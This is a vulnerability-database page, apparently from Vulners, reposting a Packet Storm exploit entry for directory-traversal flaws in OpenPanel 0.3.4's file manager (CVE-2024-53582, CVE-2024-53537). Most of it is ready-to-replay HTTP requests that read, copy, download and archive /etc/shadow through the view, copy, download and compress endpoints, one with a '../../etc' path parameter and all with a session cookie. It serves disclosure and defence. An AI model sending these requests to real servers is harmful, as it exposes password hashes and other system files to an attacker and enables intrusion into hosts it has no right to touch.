Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

OpenPanel 0.3.4 Directory Traversal

🗓️ 29 Jan 2025 00:00:00Reported by Pongtorn Angsuchotmetee, Korn Chaisuwan, Punthat SiriwanType 
packetstorm
 packetstorm🔗 packetstorm.news👁 308 Views

OpenPanel 0.3.4 has directory traversal vulnerabilities in file management functions, CVE-2024-53582.

Related
Code
ReporterTitlePublishedViews
Family
0day.today		OpenPanel 0.3.4 Directory Traversal Vulnerability
30 Jan 202500:00
zdt
Circl		CVE-2024-53537
31 Jan 202516:16
circl
Circl		CVE-2024-53582
31 Jan 202516:16
circl
CNNVD		OpenPanel 安全漏洞
31 Jan 202500:00
cnnvd
CNNVD		OpenPanel 安全漏洞
31 Jan 202500:00
cnnvd
CVE		CVE-2024-53537
31 Jan 202500:00
cve
CVE		CVE-2024-53582
31 Jan 202500:00
cve
Cvelist		CVE-2024-53537
31 Jan 202500:00
cvelist
Cvelist		CVE-2024-53582
31 Jan 202500:00
cvelist
Exploit DB		OpenPanel 0.3.4 - Directory Traversal
14 Apr 202500:00
exploitdb
Rows per page
# Exploit Title: OpenPanel 0.3.4 - Directory Traversal in Copy Function of File Manager
    # Date: Nov 25, 2024
    # Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
    # Vendor Homepage: https://openpanel.com/
    # Software Link: https://openpanel.com/
    # Version: 0.3.4
    # Tested on: macOS
    # CVE : CVE-2024-53582
    
    POST /copy_item?item_name=shadow&path_param=/etc&item_type=text%2Fplain&destination_path=/home/stefan/ HTTP/2
    Host: demo.openpanel.org:2083
    Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://demo.openpanel.org:2083/files/
    Origin: https://demo.openpanel.org:2083
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Priority: u=0
    Content-Length: 0
    Te: trailers
    
    
    -------
    
    
    # Exploit Title: OpenPanel 0.3.4 - Directory Traversal in View Function of File Manager
    # Date: Nov 25, 2024
    # Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
    # Vendor Homepage: https://openpanel.com/
    # Software Link: https://openpanel.com/
    # Version: 0.3.4
    # Tested on: macOS
    # CVE : CVE-2024-53582
    
    GET /view_file?filename=shadow&path_param=/etc HTTP/2
    Host: demo.openpanel.org:2083
    Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://demo.openpanel.org:2083/files/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Priority: u=0
    Te: trailers
    
    
    -------
    
    
    # Exploit Title: OpenPanel v0.3.4 to v0.2.1 - Directory Traversal in File Actions of File Manager
    # Date: Dec 05, 2024
    # Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
    # Vendor Homepage: https://openpanel.com/
    # Software Link: https://openpanel.com/
    # Version: 0.3.4
    # Tested on: macOS
    # CVE : CVE-2024-53537
    
    ### Compress Function ###
    POST /compress_files HTTP/2
    Host: demo.openpanel.org:2083
    Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://demo.openpanel.org:2083/files/
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 96
    Origin: https://demo.openpanel.org:2083
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Priority: u=0
    Te: trailers
    
    archiveName=/home/stefan/test/test3&selectedFiles%5B%5D=shadow&pathParam=../../etc&extension=tar
    
    ### Copy Function ###
    POST /copy_item?item_name=shadow&path_param=/etc&item_type=text%2Fplain&destination_path=/home/stefan/ HTTP/2
    Host: demo.openpanel.org:2083
    Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://demo.openpanel.org:2083/files/
    Origin: https://demo.openpanel.org:2083
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Priority: u=0
    Content-Length: 0
    Te: trailers
    
    
    ###  Download Function ###
    GET /download_file/shadow?path_param=/etc HTTP/2
    Host: demo.openpanel.org:2083
    Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://demo.openpanel.org:2083/files/
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    Priority: u=0, i
    Te: trailers
    
    
    ### View Function ### 
    GET /view_file?filename=shadow&path_param=/etc HTTP/2
    Host: demo.openpanel.org:2083
    Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://demo.openpanel.org:2083/files/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Priority: u=0
    Te: trailers

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Jan 2025 00:00Current
7.5High risk
Vulners AI Score7.5
EPSS0.03067
openpaneldirectory traversalfile managementcve-2024-53582vulnerabilityexploitmacos.
308